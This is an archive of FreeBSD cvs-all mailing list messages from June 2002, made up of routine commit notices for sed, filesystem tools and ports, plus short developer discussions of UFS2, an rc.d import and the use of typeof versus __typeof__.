X-Loop: FreeBSD.ORG * "Tim J. Robbins" escriuréres > tjr 2002/06/21 18:42:26 PDT > > Modified files: > usr.bin/sed main.c process.c > Log: > Don't store newlines at the end of each line in the hold/pattern spaces, > instead add the newline when the pattern space is printed. Make the `G' and > `H' commands add a newline to the space before the data, remove bogus > addition of newline from `x' command. Thanks very much! -- Juli Mallett | FreeBSD: The Power To Serve Will break world for fulltime employment. | finger jmallett@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 18:49: 7 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E412E37B40D; Fri, 21 Jun 2002 18:49:03 -0700 (PDT) Received: (from rwatson@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5M1n3M08791; Fri, 21 Jun 2002 18:49:03 -0700 (PDT) (envelope-from rwatson) Message-Id: <200206220149.g5M1n3M08791@freefall.freebsd.org> From: Robert Watson Date: Fri, 21 Jun 2002 18:49:03 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.sbin/extattrctl extattrctl.8 X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG rwatson 2002/06/21 18:49:03 PDT Modified files: usr.sbin/extattrctl extattrctl.8 Log: Make it clear that this applies only to UFS1 file systems, as UFS2 will have native extended attributes rather than stacked extended attributes. While I'm at it, make sure UFS_EXTATTR is not spelt FFS_EXTATTR. Sponsored by: DARPA, NAI Labs Obtained from: TrustedBSD Project Revision Changes Path 1.20 +3 -3 src/usr.sbin/extattrctl/extattrctl.8 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 18:53:38 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0C65C37B415; Fri, 21 Jun 2002 18:53:35 -0700 (PDT) Received: (from alane@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5M1rZo10358; Fri, 21 Jun 2002 18:53:35 -0700 (PDT) (envelope-from alane) Message-Id: <200206220153.g5M1rZo10358@freefall.freebsd.org> From: Alan Eldridge Date: Fri, 21 Jun 2002 18:53:34 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/kdenetwork3 Makefile ports/net/kdenetwork3/files patch-knode::knconfig.cpp X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG alane 2002/06/21 18:53:34 PDT Modified files: net/kdenetwork3 Makefile Added files: net/kdenetwork3/files patch-knode::knconfig.cpp Log: Apply fix from http://bugs.kde.org/db/44/44041.html. PR: ports/39637 Submitted by: Michael Nottebrock Reviewed by: alane Revision Changes Path 1.80 +1 -1 ports/net/kdenetwork3/Makefile 1.1 +11 -0 ports/net/kdenetwork3/files/patch-knode::knconfig.cpp (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 19: 0:15 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4B55437B407; Fri, 21 Jun 2002 19:00:10 -0700 (PDT) Received: (from billf@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5M20A112258; Fri, 21 Jun 2002 19:00:10 -0700 (PDT) (envelope-from billf) Message-Id: <200206220200.g5M20A112258@freefall.freebsd.org> From: Bill Fumerola Date: Fri, 21 Jun 2002 19:00:10 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/textproc/gsed pkg-descr X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG billf 2002/06/21 19:00:10 PDT Modified files: textproc/gsed pkg-descr Log: 'utility' is singular and so is 'exists', so use it instead of 'exist' Revision Changes Path 1.3 +1 -1 ports/textproc/gsed/pkg-descr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 19:40:50 2002 Delivered-To: cvs-all@freebsd.org Received: from beastie.mckusick.com (beastie.mckusick.com [209.31.233.184]) by hub.freebsd.org (Postfix) with ESMTP id 60F7737B403; Fri, 21 Jun 2002 19:40:46 -0700 (PDT) Received: from beastie.mckusick.com (localhost [127.0.0.1]) by beastie.mckusick.com (8.12.3/8.12.3) with ESMTP id g5M2ean9020141; Fri, 21 Jun 2002 19:40:36 -0700 (PDT) (envelope-from mckusick@beastie.mckusick.com) Message-Id: <200206220240.g5M2ean9020141@beastie.mckusick.com> To: Mikhail Teterin Subject: Re: cvs commit: src/include/protocols dumprestore.h ... Cc: bmah@FreeBSD.org, cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org In-Reply-To: Your message of "Fri, 21 Jun 2002 19:16:54 EDT." <200206211916.54853.mi+mx@aldan.algebra.com> Date: Fri, 21 Jun 2002 19:40:36 -0700 From: Kirk McKusick Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG From: Mikhail Teterin Organization: Virtual Estates, Inc. To: bmah@FreeBSD.org, Kirk McKusick Subject: Re: cvs commit: src/include/protocols dumprestore.h ... Date: Fri, 21 Jun 2002 19:16:54 -0400 Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Also, what are the benefits of the new filesystem? Is it better (faster read/write) for BIGger partitions? Would it make sense for me to convert my 60Gb storage to it? Thanks! -mi The primary difference at this point is that UFS2 can support filesystems bigger than 1 Terabyte. It will eventually support extended attributes (up to 32Kb of extra stuff associated with each file such as access-control lists and/or alternative representations of the file such as an icon). UFS1 already gets about 90% of the disk bandwidth, so there is little room left for speed improvements for big files. UFS1 also has soft updates which gives most of the available performance for small files. Kirk McKusick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 19:49:49 2002 Delivered-To: cvs-all@freebsd.org Received: from mail-relay1.yahoo.com (mail-relay1.yahoo.com [216.145.48.34]) by hub.freebsd.org (Postfix) with ESMTP id A58AE37B40A; Fri, 21 Jun 2002 19:49:43 -0700 (PDT) Received: from FreeBSD.org (12-234-90-219.client.attbi.com [12.234.90.219]) by mail-relay1.yahoo.com (Postfix) with ESMTP id 43C7D8B5C5; Fri, 21 Jun 2002 19:49:41 -0700 (PDT) Message-ID: <3D13E5C4.504DE4D9@FreeBSD.org> Date: Fri, 21 Jun 2002 19:49:40 -0700 From: Doug Barton Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.79 [en] (X11; U; FreeBSD 4.6-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: "David E. O'Brien" Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, gordon@FreeBSD.org, Mike Makonnen Subject: Re: cvs commit: src/etc/rc.d - Imported sources References: <200206211907.g5LJ7Li42640@freefall.freebsd.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG "David E. O'Brien" wrote: > > obrien 2002/06/21 12:07:21 PDT > > src/etc/rc.d - Imported sources > Update of /home/ncvs/src/etc/rc.d > In directory freefall.freebsd.org:/c/tmp/cvs-serv42453 > > Log Message: > Sync with NetBSD's mainline. Ummm.... two questions. Did you coordinate this change (and the import of sbin/rcorder) with Mike or Gordon? Second, what do you plan to do with the conflicts? We're actively working on this stuff now, so I'm not sure that this import is a Good Thing, but maybe I missed something... > 72 conflicts created by this import. > Use the following command to help the merge: > > cvs checkout -jNETBSD:yesterday -jNETBSD src/etc/rc.d > -- "We have known freedom's price. We have shown freedom's power. And in this great conflict, ... we will see freedom's victory." - George W. Bush, President of the United States State of the Union, January 28, 2002 Do YOU Yahoo!? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 19:51:46 2002 Delivered-To: cvs-all@freebsd.org Received: from mail-relay1.yahoo.com (mail-relay1.yahoo.com [216.145.48.34]) by hub.freebsd.org (Postfix) with ESMTP id 8378037B413; Fri, 21 Jun 2002 19:51:40 -0700 (PDT) Received: from FreeBSD.org (12-234-90-219.client.attbi.com [12.234.90.219]) by mail-relay1.yahoo.com (Postfix) with ESMTP id 753498B5D6; Fri, 21 Jun 2002 19:51:38 -0700 (PDT) Message-ID: <3D13E639.DEA28286@FreeBSD.org> Date: Fri, 21 Jun 2002 19:51:37 -0700 From: Doug Barton Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.79 [en] (X11; U; FreeBSD 4.6-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Bruce Evans Cc: Juli Mallett , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/usr.sbin/inetd inetd.c References: <20020622024301.H4626-100000@gamplex.bde.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Bruce Evans wrote: > > On Fri, 21 Jun 2002, Juli Mallett wrote: > > > jmallett 2002/06/21 04:25:11 PDT > > > > Modified files: > > usr.sbin/inetd inetd.c > > Log: > > Use __typeof__ instead of typeof. > > Both of these are gcc features. I prefer typeof since it doesn't give > undefined behaviour for non-gcc compilers. As far as I recall, we still have a long-term project goal of making sources that don't depend on gcc to compile, so I'd agree with Bruce that this is a bad change. Doug To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 19:56:56 2002 Delivered-To: cvs-all@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 931) id 8C19E37B409; Fri, 21 Jun 2002 19:56:50 -0700 (PDT) Date: Fri, 21 Jun 2002 19:56:50 -0700 From: Juli Mallett To: Doug Barton Cc: Bruce Evans , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/usr.sbin/inetd inetd.c Message-ID: <20020621195650.A29348@FreeBSD.ORG> References: <20020622024301.H4626-100000@gamplex.bde.org> <3D13E639.DEA28286@FreeBSD.org> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5.1i In-Reply-To: <3D13E639.DEA28286@FreeBSD.org>; from DougB@FreeBSD.org on Fri, Jun 21, 2002 at 07:51:37PM -0700 Organisation: The FreeBSD Project X-Alternate-Addresses: , , , X-Affiliated-Projects: FreeBSD, xMach, ircd-hybrid-7 X-Towel: Yes Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG * Doug Barton escriuréres > Bruce Evans wrote: > > > > On Fri, 21 Jun 2002, Juli Mallett wrote: > > > > > jmallett 2002/06/21 04:25:11 PDT > > > > > > Modified files: > > > usr.sbin/inetd inetd.c > > > Log: > > > Use __typeof__ instead of typeof. > > > > Both of these are gcc features. I prefer typeof since it doesn't give > > undefined behaviour for non-gcc compilers. > > As far as I recall, we still have a long-term project goal of making > sources that don't depend on gcc to compile, so I'd agree with Bruce > that this is a bad change. I seem to recall using at least one compiler that knew __typeof__ but not typeof, not to mention that GCC seems to be ignorant that typeof() is a builtin, but not __typeof__(), and therefore will emit bogus warnings. -- Juli Mallett | FreeBSD: The Power To Serve Will break world for fulltime employment. | finger jmallett@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 20: 0:55 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id F3C2437B406; Fri, 21 Jun 2002 20:00:52 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5M30q231855; Fri, 21 Jun 2002 20:00:52 -0700 (PDT) (envelope-from tjr) Message-Id: <200206220300.g5M30q231855@freefall.freebsd.org> From: "Tim J. Robbins" Date: Fri, 21 Jun 2002 20:00:52 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/sed process.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tjr 2002/06/21 20:00:52 PDT Modified files: usr.bin/sed process.c Log: Now that the pattern space contains no trailing newline, modify the `l' command's output so it's the same as what SUSv3 specifies. Revision Changes Path 1.22 +5 -1 src/usr.bin/sed/process.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 20:20: 9 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 323A037B406; Fri, 21 Jun 2002 20:20:06 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5M3K6238484; Fri, 21 Jun 2002 20:20:06 -0700 (PDT) (envelope-from pat) Message-Id: <200206220320.g5M3K6238484@freefall.freebsd.org> From: Patrick Li Date: Fri, 21 Jun 2002 20:20:06 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/xipdump Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/21 20:20:06 PDT Modified files: net/xipdump Makefile Log: Fix MASTER_SITES: directory structure changed PR: ports/39638 Submitted by: maintainer Revision Changes Path 1.4 +1 -1 ports/net/xipdump/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 21:19:59 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6750F37B401; Fri, 21 Jun 2002 21:19:54 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5M4JrH49202; Fri, 21 Jun 2002 21:19:53 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206220419.g5M4JrH49202@freefall.freebsd.org> From: Ying-Chieh Liao Date: Fri, 21 Jun 2002 21:19:53 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/newt Makefile distinfo ports/devel/newt/files patch-aa patch-ac X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/21 21:19:53 PDT Modified files: devel/newt Makefile distinfo devel/newt/files patch-ac Removed files: devel/newt/files patch-aa Log: upgrade to 0.50.36 PR: 39630 Submitted by: maintainer Revision Changes Path 1.17 +2 -2 ports/devel/newt/Makefile 1.5 +1 -1 ports/devel/newt/distinfo 1.4 +0 -7 ports/devel/newt/files/patch-aa (dead) 1.3 +8 -11 ports/devel/newt/files/patch-ac To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 21:27:28 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 503B337B400; Fri, 21 Jun 2002 21:27:25 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5M4RPT50326; Fri, 21 Jun 2002 21:27:25 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206220427.g5M4RPT50326@freefall.freebsd.org> From: Ying-Chieh Liao Date: Fri, 21 Jun 2002 21:27:25 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/archivers/fileroller Makefile pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/21 21:27:25 PDT Modified files: archivers/fileroller Makefile pkg-plist Log: fix plist PR: 39639 Submitted by: Ports Fury Revision Changes Path 1.4 +4 -2 ports/archivers/fileroller/Makefile 1.3 +33 -1 ports/archivers/fileroller/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 22:17:53 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3959137B406; Fri, 21 Jun 2002 22:16:31 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5M5GUP58834; Fri, 21 Jun 2002 22:16:30 -0700 (PDT) (envelope-from pat) Message-Id: <200206220516.g5M5GUP58834@freefall.freebsd.org> From: Patrick Li Date: Fri, 21 Jun 2002 22:16:30 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/ftp/mget Makefile distinfo pkg-descr X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/21 22:16:30 PDT Modified files: ftp/mget Makefile distinfo pkg-descr Log: Update to 1.4.1 PR: 39641 Submitted by: KATO Tsuguru Revision Changes Path 1.4 +2 -8 ports/ftp/mget/Makefile 1.3 +1 -1 ports/ftp/mget/distinfo 1.2 +1 -1 ports/ftp/mget/pkg-descr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 22:19:13 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 63FED37B4DD; Fri, 21 Jun 2002 22:18:54 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5M5IsN59136; Fri, 21 Jun 2002 22:18:54 -0700 (PDT) (envelope-from pat) Message-Id: <200206220518.g5M5IsN59136@freefall.freebsd.org> From: Patrick Li Date: Fri, 21 Jun 2002 22:18:54 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/graphics/gliv Makefile distinfo ports/graphics/gliv/files patch-aa X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/21 22:18:54 PDT Modified files: graphics/gliv Makefile distinfo Removed files: graphics/gliv/files patch-aa Log: Update to 1.5.2 PR: 39643 Submitted by: KATO Tsuguru Revision Changes Path 1.10 +9 -5 ports/graphics/gliv/Makefile 1.8 +1 -1 ports/graphics/gliv/distinfo 1.2 +0 -11 ports/graphics/gliv/files/patch-aa (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 22:32:22 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D2E2B37B41A; Fri, 21 Jun 2002 22:30:09 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5M5U9K60278; Fri, 21 Jun 2002 22:30:09 -0700 (PDT) (envelope-from pat) Message-Id: <200206220530.g5M5U9K60278@freefall.freebsd.org> From: Patrick Li Date: Fri, 21 Jun 2002 22:30:09 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/games/gemdropx Makefile distinfo ports/games/gemdropx/files patch-aa patch-ab X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/21 22:30:09 PDT Modified files: games/gemdropx Makefile distinfo games/gemdropx/files patch-aa Removed files: games/gemdropx/files patch-ab Log: Update to 0.9 PR: 39642 Submitted by: KATO Tsuguru Revision Changes Path 1.12 +7 -8 ports/games/gemdropx/Makefile 1.4 +1 -1 ports/games/gemdropx/distinfo 1.5 +14 -14 ports/games/gemdropx/files/patch-aa 1.3 +0 -43 ports/games/gemdropx/files/patch-ab (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 22:48:42 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 778C237B4EC; Fri, 21 Jun 2002 22:47:36 -0700 (PDT) Received: (from ache@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5M5la262079; Fri, 21 Jun 2002 22:47:36 -0700 (PDT) (envelope-from ache) Message-Id: <200206220547.g5M5la262079@freefall.freebsd.org> From: "Andrey A. Chernov" Date: Fri, 21 Jun 2002 22:47:36 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www/apache13 Makefile ports/www/apache13/files patch-ab X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ache 2002/06/21 22:47:36 PDT Modified files: www/apache13 Makefile www/apache13/files patch-ab Log: Fix more .default -> -dist leftovers Revision Changes Path 1.122 +1 -1 ports/www/apache13/Makefile 1.25 +31 -17 ports/www/apache13/files/patch-ab To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 22:54:24 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0707837B405; Fri, 21 Jun 2002 22:54:21 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5M5sKO62882; Fri, 21 Jun 2002 22:54:20 -0700 (PDT) (envelope-from pat) Message-Id: <200206220554.g5M5sKO62882@freefall.freebsd.org> From: Patrick Li Date: Fri, 21 Jun 2002 22:54:20 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www/phpnuke Makefile distinfo pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/21 22:54:20 PDT Modified files: www/phpnuke Makefile distinfo pkg-plist Log: Update to 5.6 Revision Changes Path 1.16 +1 -1 ports/www/phpnuke/Makefile 1.10 +1 -1 ports/www/phpnuke/distinfo 1.10 +158 -45 ports/www/phpnuke/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 23:25:50 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B6FAC37B481; Fri, 21 Jun 2002 23:25:41 -0700 (PDT) Received: (from clive@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5M6PfI69703; Fri, 21 Jun 2002 23:25:41 -0700 (PDT) (envelope-from clive) Message-Id: <200206220625.g5M6PfI69703@freefall.freebsd.org> From: Clive Lin Date: Fri, 21 Jun 2002 23:25:41 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/dictd/files patch-libmaa::log.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG clive 2002/06/21 23:25:41 PDT Added files: net/dictd/files patch-libmaa::log.c Log: Do not fclose(3) a NULL stream. I bet no one will want his dmesg(8) output to be spammed by ... pid 12345 (dictd), uid 54321: exited on signal 11 pid 23456 (dictd), uid 54321: exited on signal 11 pid 34567 (dictd), uid 54321: exited on signal 11 ... Revision Changes Path 1.1 +11 -0 ports/net/dictd/files/patch-libmaa::log.c (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 23:30:10 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E69BB37B405; Fri, 21 Jun 2002 23:30:02 -0700 (PDT) Received: (from clive@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5M6U2969921; Fri, 21 Jun 2002 23:30:02 -0700 (PDT) (envelope-from clive) Message-Id: <200206220630.g5M6U2969921@freefall.freebsd.org> From: Clive Lin Date: Fri, 21 Jun 2002 23:30:02 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/dictd Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG clive 2002/06/21 23:30:02 PDT Modified files: net/dictd Makefile Log: Bump PORTREVISION. Now dictd is not a dmesg(8) output spammer. Revision Changes Path 1.12 +1 -1 ports/net/dictd/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 0:28:41 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 41F2C37B65C; Sat, 22 Jun 2002 00:28:07 -0700 (PDT) Received: (from alc@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5M7S7t79417; Sat, 22 Jun 2002 00:28:07 -0700 (PDT) (envelope-from alc) Message-Id: <200206220728.g5M7S7t79417@freefall.freebsd.org> From: Alan Cox Date: Sat, 22 Jun 2002 00:28:07 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/vm vnode_pager.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG alc 2002/06/22 00:28:07 PDT Modified files: sys/vm vnode_pager.c Log: o Replace GIANT_REQUIRED in vnode_pager_alloc() by the acquisition and release of Giant. (Annotate as MPSAFE.) o Also, in vnode_pager_alloc(), remove an unnecessary re-initialization of struct vm_object::flags and move a statement that is duplicated in both branches of an if-else. Revision Changes Path 1.150 +5 -6 src/sys/vm/vnode_pager.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 0:54:26 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0F93A37B406; Sat, 22 Jun 2002 00:54:17 -0700 (PDT) Received: (from yoichi@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5M7sG981878; Sat, 22 Jun 2002 00:54:16 -0700 (PDT) (envelope-from yoichi) Message-Id: <200206220754.g5M7sG981878@freefall.freebsd.org> From: Yoichi NAKAYAMA Date: Sat, 22 Jun 2002 00:54:16 -0700 (PDT) To: cvs-committers@FreeBSD.org, 